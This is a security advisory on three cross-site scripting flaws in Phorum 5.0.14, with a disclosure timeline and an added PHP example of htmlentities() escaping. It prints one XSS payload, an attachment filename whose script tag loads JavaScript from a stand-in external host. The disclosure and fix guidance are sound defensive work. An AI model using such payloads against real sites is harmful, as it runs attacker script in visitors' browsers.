"Phorum is a web based message board written in PHP. Phorum is designed with high-availability and visitor ease of use in mind. Features such as mailing list integration, easy customization and simple installation make Phorum a powerful add-in to any website."
Three cross site scripting vulnerabilities have been found in Phorum.
Credit:
The information has been provided by Jon Oberheide.
Vulnerable Systems:
* Phorum version 5.0.14
Immune Systems:
* Phorum version 5.0.15
Attachment Filename:
When posting a message in a thread, Phorum allows file attachments of various types. When a user later views the thread containing the attachment, the filename is displayed. In file.php, the filename of the attachment is not sanitized before being output, leading to a cross-site scripting attack.
Posting an attachment with a filename such as:
example<script language='Javascript' src='http://example.com/somethingbad.js'>.txt
will result in the execution of arbitrary JavaScript in an unsuspecting user's browser when they view the thread.
Following Threads:
While the subject line of a thread is sanitized correctly in the majority of places in Phorum, it is not in the follow.php file. When a user attempts to "follow" or subscribe to a thread with a malicious subject, the code will be executed.
User Control Panel:
The user's personal control panel has a module showing a list of currently "followed" threads. Similar to the previous vulnerability, the thread subject line is not sanitized before this list is output.
Workaround:
The solution is to call PHP's htmlentities() on the filename/thread subject before it's output to the user's browser.
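The following is an added example, not Phorum's own code, contrasting the unsanitized output pattern behind all three issues with the htmlentities() workaround described above; the function names and the HTML around the value are assumptions, and the sample filename is the one from the advisory.

```php
<?php
// Added example (not Phorum's code): unsanitized output vs. htmlentities().

// Constructed sample input: the attachment filename from the advisory.
// The same pattern applies to a thread subject rendered by follow.php
// or the control panel's followed-threads list.
$filename = "example<script language='Javascript' "
          . "src='http://example.com/somethingbad.js'>.txt";

// Vulnerable pattern: the stored value is concatenated straight into the
// page, so the <script> element is parsed as markup by the browser.
function render_attachment_unsafe(string $name): string
{
    return '<li>Attachment: ' . $name . '</li>';
}

// Hardened pattern: encode the value for an HTML text context before output.
// ENT_QUOTES is passed explicitly so single quotes are encoded too; before
// PHP 8.1 the default flags left ' untouched. The charset must match the
// page's declared encoding.
function html_escape(string $value): string
{
    return htmlentities($value, ENT_QUOTES, 'UTF-8');
}

function render_attachment_safe(string $name): string
{
    return '<li>Attachment: ' . html_escape($name) . '</li>';
}

// Simple check a reviewer can run: the escaped output must contain no
// raw angle brackets, so no tag can survive into the rendered page.
function contains_raw_tag(string $html_fragment): bool
{
    return strpos($html_fragment, '<script') !== false;
}

$unsafe = render_attachment_unsafe($filename);
$safe   = render_attachment_safe($filename);

echo "Unsafe: {$unsafe}\n";   // <script ...> reaches the browser as markup
echo "Safe:   {$safe}\n";     // &lt;script ... &gt; is shown as plain text
var_dump(contains_raw_tag($unsafe)); // bool(true)
var_dump(contains_raw_tag($safe));   // bool(false)
```

If the value is also placed inside an attribute or a URL (for example a download link), the attribute must be quoted and the URL component encoded with rawurlencode() in addition to the HTML escaping shown here.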
Disclosure Timeline:
* 20.02.05 - Attachment Filename vulnerability discovered and vendor notified.
* 21.02.05 - Version 5.0.14a released to resolve this issue.
* 22.02.05 - Rest of vulnerabilities discovered and vendor notified.
* 10.03.05 - Version 5.0.15 released resolving those issues.
* 12.03.05 - Public disclosure.